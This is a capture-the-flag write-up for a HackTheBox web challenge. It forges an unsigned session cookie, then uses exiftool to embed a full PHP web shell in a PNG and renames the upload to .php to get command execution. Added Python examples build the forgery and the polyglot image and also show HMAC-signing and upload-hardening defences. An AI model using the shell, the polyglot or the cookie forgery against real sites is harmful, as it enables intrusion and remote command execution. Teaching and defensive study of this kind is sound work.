Elf Directory

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: Web

PTS: 300

Description:

Can you infiltrate the Elf Directory to get a foothold inside Santa’s data warehouse in the North Pole?


We have to infiltrate the directory and find the flag, easier said than done. Let's start by checking the website:

There is not much we can do except create a new user and log in with it.

As the orange banner reminds us, we cannot modify anything or browse other directories or settings because our account does not have the right permissions.
One thing that usually tells the application what you can and cannot do is the cookies.


And we have one.

eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOmZhbHNlfQ==

The trailing "==" padding suggests base64 encoding, and passing it through

echo "eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOmZhbHNlfQ==" | base64 -d

gives us our session info:

{"username":"username","approved":false}

Using base64 or CyberChef we can re-encode the same data with a single modification (note that the new value has no padding, since the modified JSON is a multiple of three bytes long):

{"username":"username","approved":true}
#encoded
eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOnRydWV9

Once we replace the cookie with the new value and refresh the page, the orange alert disappears: the server trusts the unsigned, client-controlled cookie as the only source of our approval state.
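The cookie tampering described above, written out as an added example (not part of the original writeup): the first three functions decode, flip and re-encode the cookie exactly as the app formats it, and the remaining ones show the fix a developer would apply, an HMAC over the payload so that a forged value fails verification. The SECRET key and the dot-separated "payload.tag" layout are assumptions for the example, not anything observed in the challenge.

```python
import base64
import hashlib
import hmac
import json

# Cookie value captured from the challenge page, as quoted in the writeup above.
ORIGINAL_COOKIE = "eyJ1c2VybmFtZSI6InVzZXJuYW1lIiwiYXBwcm92ZWQiOmZhbHNlfQ=="


def decode_cookie(cookie: str) -> dict:
    """Decode the app's unsigned base64(JSON) session cookie."""
    return json.loads(base64.b64decode(cookie))


def encode_cookie(session: dict) -> str:
    """Re-encode a session dict the way the app does: compact JSON, then base64."""
    raw = json.dumps(session, separators=(",", ":")).encode()
    return base64.b64encode(raw).decode()


def forge_approved_cookie(cookie: str) -> str:
    """Flip approved=false to true. Nothing binds the cookie to the server, so it is accepted."""
    session = decode_cookie(cookie)
    session["approved"] = True
    return encode_cookie(session)


# --- hardened form: same payload, but with an HMAC tag the client cannot compute ---
# Assumed server-side key for the example; a real app loads it from configuration.
SECRET = b"north-pole-server-secret"


def sign_cookie(session: dict) -> str:
    """Server side: append an HMAC-SHA256 tag over the encoded payload."""
    payload = encode_cookie(session)
    tag = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_cookie(signed: str):
    """Server side: return the session dict if the tag matches, otherwise None."""
    try:
        payload, tag = signed.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SECRET, payload.encode(), hashlib.sha256).hexdigest()
    # constant-time comparison avoids leaking the tag byte by byte
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_cookie(payload)


def tamper_signed_cookie(signed: str) -> str:
    """Attacker side: apply the same approved=true flip to a signed cookie, keeping the old tag."""
    payload, tag = signed.rsplit(".", 1)
    return forge_approved_cookie(payload) + "." + tag


if __name__ == "__main__":
    print("forged unsigned cookie:", forge_approved_cookie(ORIGINAL_COOKIE))
    signed = sign_cookie({"username": "username", "approved": False})
    print("signed cookie verifies:", verify_cookie(signed))
    print("tampered signed cookie verifies:", verify_cookie(tamper_signed_cookie(signed)))
```

The forged value printed by the script is the same string used in the writeup, which confirms the app's encoding is plain compact JSON inside base64 with no secret involved; with the HMAC variant the same edit is rejected because the tag no longer matches.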

The obvious next step is to upload a PHP web shell through the profile picture form and abuse it:

But it is not that easy: uploading a plain PHP file does not go through, so we need a workaround.
Using exiftool we can embed the PHP code in the metadata of a real image, in my case a random PNG called "couple.png", without corrupting the image itself.

exiftool -DocumentName="<h1>F1uffyGoat<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" couple.png

Using Burp Suite we intercept the upload request and change the "filename" field of the multipart form data
from "couple.png" to "couple.php", then forward it. The server apparently checks that the content is a valid image (which it still is) but trusts the client-supplied filename, so the file is stored with a .php extension and the embedded code will be executed when it is requested.

Once uploaded we simply need to browse to the file; using the browser's inspect tool on the profile picture we can easily get its full path.
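An added example (not from the original writeup) of the upload bypass above and of the server-side checks that do and do not stop it. It builds a valid 1x1 PNG whose tEXt chunk carries the PHP tag, the same idea as the exiftool step except that exiftool writes the code into a different metadata chunk. A magic-bytes-only check accepts the file under any name, which is what the rename in Burp exploits; the hardened check enforces an extension allowlist, drops every ancillary chunk so the PHP code never reaches disk, and lets the server choose the stored name. The payload string, chunk layout and the naming scheme are constructed for this example.

```python
import hashlib
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Constructed payload, same shape as the shell in the exiftool command above.
PHP_PAYLOAD = b"<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);} __halt_compiler();?>"
ALLOWED_EXT = {"png"}  # PNG only, to keep the example short


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one PNG chunk: length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_polyglot_png(payload: bytes = PHP_PAYLOAD) -> bytes:
    """A valid 1x1 RGB PNG whose tEXt chunk carries PHP code."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, RGB
    row = b"\x00" + b"\xff\x00\x00"  # filter byte 0 followed by one red pixel
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"tEXt", b"Comment\x00" + payload)
            + png_chunk(b"IDAT", zlib.compress(row))
            + png_chunk(b"IEND", b""))


def iter_chunks(data: bytes):
    """Walk the chunks of a PNG, yielding (type, body) pairs."""
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length  # 4 length + 4 type + data + 4 crc


def looks_like_png(data: bytes) -> bool:
    return data.startswith(PNG_SIGNATURE)


def weak_upload_check(filename: str, data: bytes) -> bool:
    """Content sniffing only: the client-supplied filename is never looked at."""
    return looks_like_png(data)


def strip_ancillary_chunks(data: bytes) -> bytes:
    """Keep only the chunks needed to render; tEXt, eXIf and friends are dropped."""
    keep = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}
    out = PNG_SIGNATURE
    for ctype, body in iter_chunks(data):
        if ctype in keep:
            out += png_chunk(ctype, body)
    return out


def hardened_upload_check(filename: str, data: bytes):
    """Return (stored_name, sanitized_bytes) or None when the upload is rejected."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT or not looks_like_png(data):
        return None
    clean = strip_ancillary_chunks(data)
    # The server picks the stored name and extension; the client's name is discarded.
    stored = hashlib.sha256(clean).hexdigest()[:16] + ".png"
    return stored, clean


if __name__ == "__main__":
    png = make_polyglot_png()
    print("weak check accepts couple.php:", weak_upload_check("couple.php", png))
    print("hardened check on couple.php:", hardened_upload_check("couple.php", png))
    name, clean = hardened_upload_check("couple.png", png)
    print("stored as", name, "payload survived:", PHP_PAYLOAD in clean)
```

The hardened path is deliberately not "just check the extension": the extension allowlist blocks the rename, and stripping metadata (or re-encoding the image with an image library) removes the payload even if some other route got a PHP-named file onto disk.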


Passing a shell command in the cmd query parameter:

http://159.65.88.143:31334//uploads/3259f_couple.php?cmd=ls

and scrolling to the end of the page (the output is appended after the image bytes) we can see our command output.

Now we only need to locate the flag with a few ls commands and print it out:

http://159.65.88.143:31334//uploads/3259f_couple.php?cmd=cat%20../../flag_65890d927c37c33.txt